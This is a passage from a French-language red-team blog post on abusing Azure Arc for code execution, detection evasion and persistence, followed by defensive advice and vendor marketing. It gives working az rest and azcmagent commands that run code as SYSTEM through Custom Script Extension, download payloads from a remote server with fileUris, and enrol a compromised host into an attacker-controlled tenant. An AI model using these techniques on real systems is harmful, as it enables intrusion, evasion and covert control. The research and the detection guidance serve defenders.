Ce script PowerShell n’est pas automatiquement supprimé à la fin de l’exécution, bien que des exécutions supplémentaires d’un job d’exécution portant le même nom entraînent la suppression du script original et la création d’un nouveau script avec un suffixe itéré, comme indiqué ci-dessous.

La tâche mise à jour exécute désormais la calculatrice au lieu du bloc-notes, efface le script précédent et en crée un nouveau avec un suffixe itératif
Figure 45 : la tâche mise à jour exécute désormais la calculatrice au lieu du bloc-notes, efface le script précédent et en crée un nouveau avec un suffixe itératif.

En plus de ce script, plusieurs autres fichiers sont créés sur le disque lors de chaque exécution de la commande d'exécution. Ces questions seront abordées plus en détail dans la section consacrée aux conseils défensifs.

De plus, n'oubliez pas qu'une commande d'exécution crée un objet dans Azure qui doit ensuite être supprimé une fois l'exécution terminée. Étant donné que cette action ne s'applique pas au niveau du groupe de ressources, elle peut être exécutée directement via la CLI d'az.

Supprimer l'objet associé à une commande d'exécution créée précédemment
Figure 46 : suppression de l'objet associé à une commande d'exécution précédemment créée

Extensions

Les fonctionnalités des clients Arc peuvent être étendues grâce à l'installation de diverses extensions approuvées par Microsoft, comme pour les machines virtuelles Azure. L'extension la plus souvent utilisée est Custom Script Extension (CSE) pour Windows, qui permet à la fois l'exécution de commandes arbitraires et le téléchargement de fichiers via Internet. Cependant, d'autres extensions proposent différents arbres d'exécution qui peuvent aider à échapper à une détection statique axée sur l'exécution d'un CSE. Nous examinerons ensuite l'exécution via un CSE, ainsi que l'extension Windows Admin Center.

Extension de script personnalisée

En supposant que vous exécutiez dans le contexte d’un principal de service provisionné avec le rôle Azure Connected Machine Resource Administrator dans un abonnement avec les paramètres par défaut, vous devrez à nouveau envoyer des commandes via l’API REST d’Azure. Avant l'exécution, il est important de noter qu'une seule copie d'une extension peut être déployée sur un hôte à un moment donné. Par conséquent, si une extension CSE a déjà été ajoutée à l'hôte cible, il est nécessaire de mettre à jour l'extension existante plutôt que d'en créer une nouvelle. La liste des extensions actuellement installées sur un hôte peut être récupérée depuis la CLI d'az à l'aide de la commande suivante :

az connectedmachine extension list --machine-name [machine name] --resource-group [rg name]

Dans ce cas, aucune extension n’est encore installée sur cet hôte :

Client Arc sans extensions associées
Figure 47 : client Arc sans extensions associées

Plusieurs arguments sont requis lors de la création d'un CSE, le plus important étant l'argument protectedSettings, car il contient un attribut facultatif commandToExecute. C'est dans cet attribut que sont placés les arguments d'exécution de la commande. Vous trouverez ci-dessous un exemple de commande CLI d'az qui peut être exécutée avec l'API REST pour créer un CSE qui ouvre le bloc-notes :

az rest --method put --uri
"https://management.azure.com/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[arbitrary CSE name]?api-version=2025-02-19-preview" --body "{\"location\":\"[resource location]\",\"properties\":{\"publisher\":\"Microsoft.Compute\",\"type\":\"CustomScriptExtension\",\"typeHandlerVersion\":\"1.10\",\"autoUpgradeMinorVersion\":true,\"settings\":{},\"protectedSettings\":{\"commandToExecute\":\"[Thing to run.exe]\"}}}"

L'exécution de cette commande entraîne à nouveau une exécution dans le contexte de NT_AUTHORITY\SYSTEM.

Arborescence de processus associée à l'exécution via CSE
Figure 48 : arborescence des processus associés à l'exécution via CSE

Une fois qu'un CSE a été créé, vous pouvez également vérifier son statut actuel via l'API REST, à l'aide d'une commande au format suivant :

az rest --method get --uri
"https://management.azure.com/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[CSE name from prior step]?api-version=2025-02-19-preview"

En exécutant cette opération, nous pouvons constater que le déploiement du CSE reste dans un état d'exécution jusqu'à ce que le processus qu'il a lancé soit terminé sur le système client.

État de l'extension client Arc lorsqu'un CSE est en cours d'exécution
Figure 49 : état de l'extension client Arc lorsqu'un CSE est en cours d'exécution

Il est important de garder ce comportement à l'esprit, car les extensions ne peuvent pas être bloquées de force, même en tentant de supprimer le CSE. Par conséquent, si vous lancez une CSE qui engendre un processus de longue durée qui ne vous donne pas accès au système, et que vous ne disposez pas d’un autre mécanisme (comme les commandes d’exécution) pour vous permettre d’arrêter le processus, vous pourriez potentiellement vous empêcher d'accéder à d'autres exécutions CSE jusqu'au redémarrage de la machine. De plus, si vous utilisez un CSE comme mécanisme pour déployer une balise C2, il est recommandé de migrer hors du processus d'origine afin de pouvoir nettoyer l'objet CSE.

Pour poursuivre, supposons que nous souhaitions réaliser une opération plus avancée avec notre exécution CSE que simplement ouvrir le bloc-notes. Plusieurs options sont disponibles pour mettre à jour notre CSE actuel. Nous pouvons soit effectuer la mise à jour sur place, soit supprimer l'extension CSE et la redéployer. La mise à jour sur place est plus simple, mais elle nécessite que l'exécution CSE précédente ait atteint un certain état (par exemple, réussie ou échouée) avant de s'exécuter. Pour mettre à jour un CSE déjà existant, vous pouvez simplement modifier et soumettre à nouveau la commande originale que vous avez transmise à l’API REST pour la créer, en changeant la valeur de l’attribut commandToExecute pour la commande mise à jour. Cela présente l'avantage supplémentaire de conserver la structure des dossiers CSE sur le système client entre les exécutions.

J'ai constaté que, dans certains cas, le CSE peut se bloquer dans un état Creating (création), même lorsque le processus qu'il a exécuté ne s'exécute plus sur le système client. La meilleure méthode que j'ai trouvée pour identifier cet état consiste à vérifier la liste des extensions sur l'hôte concerné, qui affichera probablement l'hôte dans un état provisioningState de Creating, mais si un processus est toujours en cours d'exécution sur l'hôte, vous remarquerez également un message de statut indiquant que l'exécution est en cours.

Tentative de mise à jour d’une CSE toujours à l’état Creating
Figure 50 : tentative de mise à jour d'un CSE toujours en cours de création (Creating)
CSE dans un état de création (Creating) avec le processus sous-jacent toujours en cours d'exécution, comme indiqué par le message d'état instanceView
Figure 51 : CSE dans un état de création (Creating) avec le processus sous-jacent toujours en cours d'exécution, comme indiqué par le message d'état instanceView
CSE dans un état de création (Creating) sans processus sous-jacent en cours d'exécution, veuillez noter le statut vide de l'instanceView
Figure 52 : CSE dans un état de création sans processus sous-jacent en cours d'exécution, notez le statut vide de l'instanceView

Si vous constatez que votre CSE se trouve dans cet état « En cours de création, mais ne s'exécute pas actuellement » (Creating, but not actually running), la meilleure approche consiste à le supprimer entièrement (si vous êtes certain que le processus que vous avez exécuté avec celui-ci ne s'exécute plus), ce qui peut être réalisé à l'aide de la commande suivante :

az resource delete --ids "/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[CSE Name]"

Tenter de supprimer un CSE alors que l'exécutable sous-jacent est toujours en cours d'exécution (par exemple, une balise https s'exécutant en tant que NT_AUTHORITY\SYSTEM qui ne peut pas quitter le système en raison des contrôles proxy) n'entraînera pas la fin du processus, ni la suppression du CSE. Au contraire, cela peut entraîner le blocage indéfini de l'extension CSE dans un état Deleting (suppression), la seule solution complète que j'ai identifiée étant de supprimer l'objet parent Hybrid Identity d'Azure, de désinstaller le client Arc du système géré et de tout réinstaller. Cela peut sembler inquiétant, mais une fois que j'ai compris cela, il m'a suffi de cinq minutes pour que tout fonctionne à nouveau.

Autre chose à garder à l’esprit concernant la suppression des CSE : le processus de suppression supprime le dossier C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension du disque du système client, effaçant ainsi tous les fichiers que vous auriez pu télécharger ou modifier dans cette structure. De plus, le traitement de la commande de suppression CSE dans Azure prend entre trois et cinq minutes ; ceci est normal.

L'une des choses intéressantes qu'un CSE peut faire en plus d'exécuter des commandes est de télécharger des fichiers à partir d'Internet. Un tableau de fichiers peut être spécifié sous l’arg de paramètres dans l’attrib de fileUris, qui permet de télécharger des fichiers dans le dossier C :\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\[version]\Downloads\[iterator]. Cette structure de dossiers est conservée jusqu’à la suppression de la CSE dans Azure. Tout ce qui est lié à l’extension CSE est alors supprimé du disque. Cela signifie que vous pouvez créer un script qui copiera les fichiers de ce dossier vers un autre endroit du disque, ce qui permet de créer un mécanisme de contrebande de fichiers qui ne repose pas sur un berceau de téléchargement web traditionnel. Comme ces fichiers subsistent une fois qu'ils sont déplacés en dehors du répertoire par défaut, ils peuvent être copiés, puis exécutés avec une CSE ultérieure provenant d'ailleurs sur le disque, ce qui brise une détection statique dépendante de l'identification des exécutions à partir du dossier de téléchargements CSE précédemment noté.

Lors de la création d'une logique plus avancée comme celle-ci, dont le succès n'est pas garanti, il est également utile de pouvoir récupérer une sortie indiquant si l'exécution a réussi ou non. Bien que nous ne puissions pas récupérer directement la sortie des exécutions CSE, des codes de sortie sont renvoyés, ce qui signifie que nous pouvons inclure des branchements conditionnels dans notre code qui se terminent avec un code spécifique en fonction de l'état actuel du programme (par exemple, copie de fichier réussie). En assemblant ces éléments, mettons en place une démonstration très élaborée qui effectue les opérations suivantes :

  • Télécharge deux fichiers via le paramètre fileUris à partir d'un serveur web, intitulés notVirus.exe et alsoNotVirus.txt. Dans ce cas, j’utiliserai un serveur web local avec un nom d’hôte legitServer. Comme cela sera géré par fileUris, nous n'avons pas besoin de le coder explicitement dans notre script PowerShell.
  • Le script PowerShell doit copier les fichiers téléchargés dans C:\Windows\Temp
  • Enfin, le script se termine avec un code de sortie de 10 en cas de téléchargement et de copie réussis, et un code de 20 en cas d'échec.

Un simple script PowerShell capable d'accomplir ces tâches ressemblerait à ceci :

try
{
    Copy-Item -Path "NotVirus.exe" -Destination "C:\Windows\Temp\NotVirus.exe" -Force -
ErrorAction Stop
    Copy-Item -Path "AlsoNotVirus.txt" -Destination "C:\Windows\Temp\AlsoNotVirus.txt" -
Force -ErrorAction Stop
if ((Test-Path "C:\Windows\Temp\NotVirus.exe") -and (Test-Path
"C:\Windows\Temp\AlsoNotVirus.txt"))
    {
        exit 10
    }
    else
    {
        exit 20
    }
}
catch
{
    exit 20
}

En formatant ceci avec toutes les commandes nécessaires pour permettre à ce script d'être transmis dans un blob JSON via l'API REST az, nous obtenons une commande qui ressemble à ce qui suit :

az rest --method put --uri
"https://management.azure.com/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[arbitrary CSE name]?api-version=2025-02-19-preview" --body "{\"location\":\"[resource location]\",\"properties\":{\"publisher\":\"Microsoft.Compute\",\"type\":\"CustomScriptExtension\",\"typeHandlerVersion\":\"1.10\",\"autoUpgradeMinorVersion\":true,\"settings\":{\"fileUris\":[\"http://legitServer/NotVirus.exe\",\"http://legitServer/AlsoNotVirus.txt\"]},\"protectedSettings\":{\"commandToExecute\":\"powershell.exe -ExecutionPolicy Bypass -Command \\\"try { Copy-Item -Path NotVirus.exe -Destination C:\\\\Windows\\\\Temp\\\\NotVirus.exe -Force -ErrorAction Stop; Copy-Item -Path AlsoNotVirus.txt -Destination C:\\\\Windows\\\\Temp\\\\AlsoNotVirus.txt -Force -ErrorAction Stop; if ((Test-Path 'C:\\\\Windows\\\\Temp\\\\NotVirus.exe') -and (Test-Path 'C:\\\\Windows\\\\Temp\\\\AlsoNotVirus.txt')) { exit 10 } else { exit 20 } } catch { exit 20 }\\\"\"}}}"

Nous exécutons la commande ci-dessus, et après avoir attendu une minute, nous pouvons vérifier son état à l'aide de la commande az connectedmachine extension list. L'exécution de ce programme montre que nous avons obtenu un code de sortie 10, ce qui indique une exécution réussie. Le message d’erreur est un message générique indiquant un code de retour non nul, ce qui ne nous concerne pas.

Informations sur l'extension indiquant que CSE est terminé avec un code d'état de 10, ce qui indique la bonne exécution de notre script
Figure 53 : informations d'extension indiquant que le CSE s'est arrêté avec un code d'état de 10, ce qui signifie que notre script s'est exécuté avec succès

En vérifiant le système à distance, nous pouvons également nous assurer que les fichiers ont bien été copiés.

Fichiers copiés dans C:\Windows\Temp par CSE
Figure 54 : fichiers copiés dans C:\Windows\Temp par CSE

Comme nous pouvons le constater, ce code commence à se compliquer assez rapidement. Pour simplifier encore les choses, il serait également possible de télécharger un script PowerShell en l'ajoutant au tableau fileUris et en l'appelant à partir de l'attribut commandToExecute.

Avant de poursuivre, permettez-moi de partager une dernière idée sur la manière dont vous pourriez améliorer la discrétion de cette technique en modifiant son empreinte d'exécution. Si vous vous souvenez de notre lancement initial du processus via CSE, cmd.exe apparaissait en haut de l'arborescence d'exécution, sans processus parent facilement identifiable.

Arborescence du processus d'exécution CSE
Figure 55 : arborescence du processus d'exécution du CSE

En examinant ce processus cmd.exe situé tout en haut, on constate que l'ID du processus parent (PID) 5068 n'existe pas.

PID mystérieux de 5068
Figure 56 : PID mystère de 5068

Nous pouvons approfondir notre analyse avec Process Monitor, qui nous montre que notre mystérieux ID de processus parent (PPID) 5068 était en réalité une autre instance de cmd.exe, qui a créé notre arborescence de processus actuelle via un appel cmd /c. Ce processus mystérieux cmd a lui-même été engendré par gc_extension_service.exe dans le PID 3588 en exécutant le script enable.cmd.

Sortie ProcMon affichant un arbre d'exécution plus complet lors de l'exécution d'un CSE
Figure 57 : sortie ProcMon affichant un arbre d'exécution plus complet lors de l'exécution d'un CSE
Script Enable.cmd contenant un script cmd qui appelle CustomScriptHandler.exe
Figure 58 : script Enable.cmd contenant un script cmd qui appelle CustomScriptHandler.exe

En quoi tout cela est-il important ? Actuellement, nous disposons d'un arbre d'exécution relativement statique, allant de gc_extension_service -> cmd.exe -> cmd.exe -> CustomScriptHandler.exe -> cmd.exe -> [tout ce que nous exécutons via CSE]. Si nous pouvions nous insérer plus haut dans cette chaîne, nous pourrions contourner les détections axées sur des exécutions suspectes provenant de cette arborescence de processus bien connue. Étant donné que ce fichier .cmd n'est qu'un script non signé exécuté par NT_AUTHORITY\SYSTEM à partir d'un emplacement connu à la suite d'un événement que nous contrôlons (création ou modification d'un CSE), il serait possible de modifier ce script afin de rediriger le flux d'exécution standard pour appeler directement un processus de notre choix. En supposant que notre seul vecteur d'exécution sur l'hôte passe par Arc, cela pose toutefois un problème de type « l'œuf ou la poule », car nous devrions exécuter via une arborescence de processus connue pour modifier ce fichier. Cependant, la modification du texte d'un fichier non signé est beaucoup moins détectable que d'autres actions post-exploitation classiques. Je n'entrerai pas dans les détails de cette modification (ou d'autres modifications similaires qui pourraient être apportées à d'autres extensions), mais je vous donne simplement une idée de ce que vous pourriez faire.

Résultats de la modification de l'arborescence d'exécution du processus afin d'interrompre le déroulement prévu du processus
Figure 59 : résultats de la modification de l'arborescence d'exécution du processus afin d'interrompre le déroulement prévu du processus

Windows Admin Center (et autres extensions)

Jusqu'à présent, nous nous sommes concentrés sur les attaques possibles à l'aide de l'API REST non interactive du point de vue d'un principal de service surprovisionné configuré avec le rôle Azure Connected Machine Resource Administrator. Cependant, si nous disposons d'un compte ayant accès à l'interface utilisateur graphique (GUI) Web, l'éventail des actions possibles s'élargit considérablement. Il existe diverses extensions qui peuvent être transmises aux clients gérés et ouvrir de nouvelles possibilités d'exécution de code, mais lorsque j'ai exploré Arc, celle qui m'a le plus intéressé était Windows Admin Center (WAC). Arc peut déployer le composant de gestion back-end de Windows Admin Center, un outil de gestion à distance autonome publié par Microsoft, via une extension Arc. À ma connaissance, il n'est pas possible d'interagir directement avec cette extension via l'API REST Azure, mais diverses options de gestion du système sont exposées via l'interface utilisateur graphique une fois déployées chez un client.

Une fois l'extension WAC (lol) installée sur un système géré par Arc, on peut y accéder directement via le portail Arc en accédant à l'appareil géré, à condition que le rôle approprié vous soit attribué (ou que vous puissiez vous l'attribuer vous-même).

WAC nécessite le rôle de connexion Administrateur Windows Admin Center pour se connecter
Figure 60 : WAC nécessite le rôle de connexion Administrateur Windows Admin Center pour se connecter

Une fois l'accès approprié configuré, vous pouvez vous connecter à l'interface de gestion et exécuter du code via divers mécanismes, notamment la création de processus, la création/modification de tâches planifiées, la modification de services et la modification du registre. Je ne vais pas entrer dans les détails de chacun de ces mécanismes, mais je vais rapidement aborder la création de processus à titre d'exemple illustrant certaines particularités de l'exécution via WAC.

La création d'un processus est probablement la manière la plus simple d'exécuter du code via WAC. Il suffit de saisir un processus à exécuter (avec des arguments facultatifs) et de cliquer sur « Go ».

Ouvrir le bloc-notes via WAC
Figure 61 : ouverture du bloc-notes via WAC
Arborescence des processus résultant de l'exécution directe des processus dans WAC
Figure 62 : arborescence des processus résultant de l'exécution directe des processus dans WAC

Il est intéressant de noter que cela s'exécute dans le contexte d'un compte virtuel(WAC_[votre nom d'utilisateur azure]), mais dans un contexte à haute intégrité avec tous les privilèges de token, comme on peut le constater en redirigeant une commande whoami /priv vers un fichier texte sur le disque.

Privilèges de token attribués lors de l'exécution de commandes via WAC
Figure 63 : privilèges de token attribués lors de l'exécution de commandes via WAC

Le processus lui-même est généré en tant que processus enfant de WmiPrvSe.exe, une arborescence de processus familière pour ceux qui connaissent bien les mouvements latéraux via Process.Create. Lorsqu'une commande est exécutée de cette manière, le compte virtuel dispose d'un dossier utilisateur créé pour lui sur le disque, laissant derrière lui encore plus d'indicateurs de compromission (IOC) qui doivent être nettoyés. Il est toutefois très facile à utiliser.

En plus de ces vecteurs d'exécution de code, il existe diverses autres fonctionnalités de gestion telles que la navigation graphique dans les fichiers et les partages de fichiers, une fonctionnalité indispensable pour votre propre C2 dédié aux entreprises.

capture d'écran des vecteurs d'exécution de code pour Windows > System32
Fig. 64

WAC dispose également d'un panneau de contrôle VM, qui permet l'installation d'Hyper-V sur le système géré, puis le déploiement et la gestion des machines virtuelles.

Configuration Hyper-V via WAC
Figure 65 : configuration Hyper-V via WAC
Déploiement et gestion des machines virtuelles dans WAC
Figure 66 : déploiement et gestion des machines virtuelles dans WAC

Cette fonctionnalité semblait initialement très prometteuse, mais j'ai rencontré des problèmes lorsque j'ai essayé de comprendre comment déployer un fichier ISO sur l'hôte. Le navigateur de fichiers de WAC dispose d'une fonctionnalité de téléchargement intégrée, mais la taille maximale de téléchargement est malheureusement assez faible. Cela impliquait la mise en place d'un mécanisme de secours afin d'obtenir une image ISO appropriée sur le système pour pouvoir créer une machine virtuelle. D'autres problèmes ont été constatés, qui pourraient également se présenter dans un environnement d'entreprise en ce qui concerne la virtualisation imbriquée. Étant donné que de nombreux systèmes en environnement d'entreprise sont généralement virtualisés, Intel VT-x / AMD-V doit être activé sur le système pour permettre la virtualisation imbriquée.

Enfin, avec toutes ces fonctionnalités de gestion disponibles, il existe de nombreuses attaques intéressantes que vous pourriez mener via le remplacement ou la modification de fichiers afin de détourner les actions effectuées en arrière-plan par Arc / WAC et masquer davantage toute action post-exploitation. Veuillez noter qu'il ne s'agit là que d'une des nombreuses extensions disponibles pour les clients gérés par Arc ; des vecteurs d'exécution de code similaires existent sans aucun doute dans d'autres extensions qui peuvent offrir des fonctionnalités supplémentaires.

Notez que WAC effectue ses propres installations autonomes et augmente ainsi considérablement l'espace disque occupé et les besoins de nettoyage associés à une compromission. De plus, les actions qui s’exécutent dans le contexte d’un compte WAC_ entraîneront des actions supplémentaires sur le disque, comme la création d’un dossier utilisateur, bien qu’aucun profil utilisateur local ne soit généré pour le compte. Cela étant dit, bien que cela constitue une approche intéressante qui ouvre de nombreuses possibilités d'exécution de code, je préfère l'éviter sur un serveur essentiel.

En prime : aucun privilège administrateur

Supposons que vous ayez récupéré un secret de principal de service, mais qu'il ait été correctement provisionné pour permettre uniquement l'intégration de systèmes. Il peut néanmoins être utile d'essayer d'intégrer un système que vous contrôlez afin de vérifier si des installations ou des configurations automatisées contenant des informations d'identification supplémentaires sont transmises en aval vers votre système.

Azure Arc comme mécanisme de persistance

C'est un sujet dont je n'avais pas beaucoup entendu parler jusqu'au récent article d'Andy Gill sur l'utilisation d'Arc comme mécanisme C2. Arc est remarquable dans la mesure où il s'agit d'un produit Microsoft authentique qui communique directement avec des points de terminaison API reconnus au sein d'Azure, ce qui signifie qu'il est généralement ignoré par les produits EDR (Détection et réponse des terminaux). Bien que je ne recommande pas d'essayer d'opérer via Arc, il constitue un mécanisme hors bande intéressant pour la persistance en cas de défaillance dans un environnement. Même si un hôte est connecté de manière hybride à un environnement Entra, il n'est pas nécessaire qu'il se connecte à une instance Arc hébergée dans le même locataire. Cela signifie en réalité que si vous disposez d'un contexte à haute intégrité sur un hôte qui n'est pas encore géré via Arc, vous pouvez déployer votre propre client Arc et le gérer via votre propre locataire Azure.

Étant donné que l'article d'Andy explique très bien l'utilisation générale d'Arc pour la persistance, je me contenterai d'ajouter une petite remarque concernant l'opérationnalisation lorsque l'accès via une interface graphique n'est pas possible (comme c'est généralement le cas lors de l'utilisation d'un agent C2). En examinant les scripts de déploiement, le processus d’installation du client Arc se compose principalement de deux parties : l’installation du client réel via un installateur MSI, et la connexion du client installé à un locataire Azure via des arguments en ligne de commande transmis à l’Agent Arc Connected Machine Agent (C:\Program Files\AzureConnectedMachineAgent\azcmagent.exe). Les deux étapes de ce processus peuvent être effectuées localement ou à distance (en utilisant votre méthode préférée d'exécution de code de mouvement latéral) à partir d'un contexte de ligne de commande non interactif, en utilisant la syntaxe approximative suivante :

1.

msiexec /i C:\path\to\AzureConnectedMachineAgent.msi /l*v C:\path\to\write\installationlog.txt /qn REBOOT=ReallySuppress

2.

"C:\Program Files\AzureConnectedMachineAgent\azcmagent.exe" connect --service-principal-id "[Service Principal Application ID]" --service-principal-secret "[Your SP Secret]" --resource-group "[resource group]" --tenant-id "[your tenant ID]" --location "[Azure region you want client to be associated with]" --subscription-id "[your subscription]" --cloud "AzureCloud" --correlation-id "[pretty sure random GUID, can just grab from an actual script deployment]"

Une fois connecté, le système apparaîtra dans la lame Arc de votre locataire Azure, et vous pourrez utiliser la CLI d'az, l'API REST d'az ou l'interface graphique pour effectuer des actions sur le système. Maintenant que le client Arc est connecté à un locataire sur lequel vous avez un contrôle total, vous disposez également d'un éventail plus large d'options pour l'exécution ultérieure de code, qui vont au-delà du cadre de ce qui a été abordé dans cet article.

Remarque supplémentaire concernant le déploiement d'Arc : il n'est malheureusement pas possible de se connecter « par-dessus » une autre configuration Arc sans avoir préalablement déconnecté la connexion Arc existante, une opération qui nécessite le rôle Azure Connected Machine Resource Administrator. Il est possible de contourner cette difficulté en désinstallant complètement puis en réinstallant le client Arc, mais ce ne serait pas ma première option en termes d'exécution ou de persistance. Concrètement, cela signifie que si un système dispose déjà d'Arc, il est préférable de vous concentrer sur l'accès à celui-ci via la connexion existante, plutôt que d'essayer d'établir une connexion à votre propre locataire.

Conseils défensifs

Contrôles préventifs

  • Assurez-vous que les principaux de service ont un accès correctement restreint afin de ne leur attribuer que les rôles explicitement requis ; en substance, n'accordez pas à un principal de service de déploiement le rôle Azure Connected Machine Resource Administrator.
  • Par défaut, Arc attribue des autorisations au niveau du groupe de ressources, mais des attributions de rôles privilégiés ayant une incidence sur Arc peuvent également être effectuées au niveau de l'abonnement en amont et du groupe de gestion (si cette option est activée dans votre locataire). Procédez à des vérifications périodiques des accès afin de vous assurer que les attributions de rôles permettant d'exécuter du code via Arc (comme indiqué dans la section Accéder à Arc ci-dessus) sont appropriées. Un exemple de cet accès sur deux principaux de service est disponible ci-dessous :

 

Principaux de service auxquels le rôle d'Azure Connected Machine Resource Administrator a été attribué dans Azure
Figure 67 : principaux de service auxquels le rôle d'Azure Connected Machine Resource Administrator a été attribué dans Azure
  • Restreignez autant que possible l’accès aux scripts de déploiement dans les environnements sur site. Par exemple, si le déploiement est effectué via GPO, l’accès au partage de déploiement doit être limité non pas à tous les ordinateurs du domaine, mais à un groupe de systèmes dont les membres seront inscrits dans Arc.
  • Les listes d’autorisation et de blocage des extensions peuvent être déployées localement sur les systèmes gérés par Arc directement via l’exécutable local azcmagent. Elles peuvent être configurées pour interdire les extensions inutilisées (telles que la commande d’exécution ou les CSE) et, en raison de leur nature locale, même un administrateur global dans Azure ne serait pas en mesure de les modifier directement. Les instructions officielles de Microsoft à ce sujet sont disponibles ici.
  • Il est possible de déployer des politiques Azure qui limitent les extensions pouvant être installées sur les systèmes gérés par Arc. Sur le plan fonctionnel, c’est similaire à une liste de blocage implémentée localement via la configuration azcmegent, mais elle est implémentée depuis Azure. Le principal inconvénient de cette approche est qu’un pirate suffisamment privilégié dans Azure pourrait de manière réaliste supprimer ou modifier les politiques applicables, lui permettant d’exécuter ensuite du code sur des systèmes gérés par Arc.

Contrôles de détection (surveille)

  • Les configurations spécifiques de surveillance de l'arborescence des fichiers et des processus peuvent s'avérer moins efficaces pour identifier les exécutions suspectes via Arc si des commandes d'exécution ou des CSE sont légitimement utilisés au sein d'une entreprise. Toutefois, si ce n’est pas le cas, des règles spécifiques peuvent être écrites pour mieux identifier les étapes de la post-exploitation via Arc. Les deux blogs suivants contiennent une grande quantité de détails techniques sur l'identification des installations et des exécutions d'Arc sur la base d'indicateurs sur le disque et de structures d'arborescence de processus :
    - https://www.nsideattacklogic.de/azure-arc-part-2-escalation-from-cloud-to-on-premises/
            -  https://blog.zsec.uk/azure-arc-c2aas/
  • La surveillance au niveau de l'abonnement dans Azure suivra toutes les exécutions via la commande d'exécution ou l'extension dans les éléments du journal RunCommand et Install or Update an Azure Arc extension (installer ou mettre à jour une extension Azure Arc), respectivement. Notez que l'extension Install or Update an Azure Arc extension peut afficher un statut d’échec, car souvent le processus exécuté renvoie un code d’erreur non nul. Bien que ces journaux n'affichent pas la commande exacte exécutée ou le blob CSE transmis, ils indiquent l'heure à laquelle l'opération a été effectuée et l'utilisateur qui l'a effectuée.
  • Les rôles pouvant être utilisés pour exécuter des commandes sur des systèmes gérés via Arc doivent être considérés comme sensibles et les changements d'abonnement doivent être surveillés. Les modifications de rôle dans Azure RBAC sont consignées dans le journal d'activité Azure dans les entrées de journal Create role assignment (Créer une attribution de rôle).
  • La structure du script de déploiement Arc est relativement statique sur tous les canaux de déploiement officiellement pris en charge. Si des outils sont en place dans un environnement prenant en charge l'analyse du contenu des fichiers, une signature de base pour ce script pourrait être mise en œuvre afin d'identifier toutes les instances de scripts de déploiement. Une approche similaire, bien que légèrement moins efficace, consisterait à rechercher dans les fichiers le nom par défaut du script de déploiement, à savoir OnboardingScript.ps1.
  • C :\ProgramData\AzureConnectedMachineAgent\Config\agentconfig.json inclut l’ID du locataire auquel Arc est actuellement connecté. Les déploiements non autorisés d'Arc pourraient être identifiés en croisant cette valeur sur tous les systèmes où Arc est installé avec l'identifiant du locataire de l'entreprise.
  • Azure Arc présente de nombreuses similitudes avec d'autres outils de surveillance et de gestion à distance (RMM). Considérer l'installation inattendue d'Arc sur un système comme un événement pouvant déclencher une alerte peut aider à identifier un déploiement non autorisé utilisé à des fins de C2 secrètes.

Recherches préalables sur Azure Arc

Remarque : cette liste ne prétend pas être exhaustive de toutes les recherches liées à l'utilisation offensive d'Arc ; elle contient plutôt une liste d'articles et de conférences qui m'ont aidé à mieux comprendre la plateforme ainsi que les vecteurs d'attaque disponibles par son intermédiaire.

  • Andy Gill – « LOLCLOUD - Azure Arc - C2aaS » : https://blog.zsec.uk/azure-arc-c2aas/
  • Benedikt Strobl – NSIDE Attack Logic – « Azure Arc – Partie 1 – Escalade du sur site vers le cloud » : https://www.nsideattacklogic.de/azure-arc-part-1-escalation-from-on-premises-to-cloud/
  • Benedikt Strobl – NSIDE Attack Logic – « Azure Arc – Part 2 – Escalation from Cloud to On-Premises » : https://www.nsideattacklogic.de/azure-arc-part-2-escalation-from-cloud-to-on-premises/
  • Christian Bortone – « Abusing Azure Arc: From Service Principal Exposed To Reverse Shell » (Conférence) : https://www.youtube.com/watch?v=KtRYn5GA4iU
  • CloudBreach – « Abusing Azure Arc for lateral movement » : https://cloudbreach.io/blog/abusing-azure-arc-for-lateral-movement/
  • Karl Fosaaen – NetSPI – « Abusing Azure Hybrid Workers for Privilege Escalation – Part 1 » : https://www.netspi.com/blog/technical-blog/cloud-pentesting/abusing-azure-hybrid-workers-for-privilege-escalation/
  • Renos Nikolaou – « Abusing Azure Arc for lateral movement » : https://medium.com/@r3n_hat/abusing-azure-arc-for-lateral-movement-39a1b56cbf2b
  • Ryan Hausknecht – « Azure Virtual Machine Execution Techniques » : https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/
  • Soroganoth – « Azure VM Security: Part 1: Moving from management plane to data plane and the Run Command » : https://soroganoth.com/post/research/azure_vm_security/
Mixture of Experts | 12 décembre, épisode 85

Décryptage de l’IA : Tour d’horizon hebdomadaire

Rejoignez notre panel d’ingénieurs, de chercheurs, de chefs de produits et autres spécialistes de premier plan pour connaître l’essentiel de l’actualité et des dernières tendances dans le domaine de l’IA.
Regardez tous les épisodes de Mixture of Experts
Solutions connexes
Services de gestion des menaces

Prévoyez, prévenez et répondez aux menaces modernes pour accroître la résilience de l’entreprise.

 

 Découvrir les services de gestion des menaces
Solutions de détection et de réponse aux menaces

Utilisez les solutions de détection et de réponse aux menaces d’IBM pour renforcer votre sécurité et accélérer la détection des menaces.

 Découvrir les solutions de détection des menaces
Solutions de défense contre les menaces mobiles (MTD)

Protégez votre environnement mobile avec les solutions complètes de défense contre les menaces mobiles d’IBM MaaS360.

 Explorer les solutions de défense contre les menaces mobiles
Passez à l’étape suivante

Bénéficiez de solutions complètes de gestion des menaces, afin de protéger votre entreprise avec compétence contre les cyberattaques.

 Découvrir les services de gestion des menaces Demander une séance d’information sur les menaces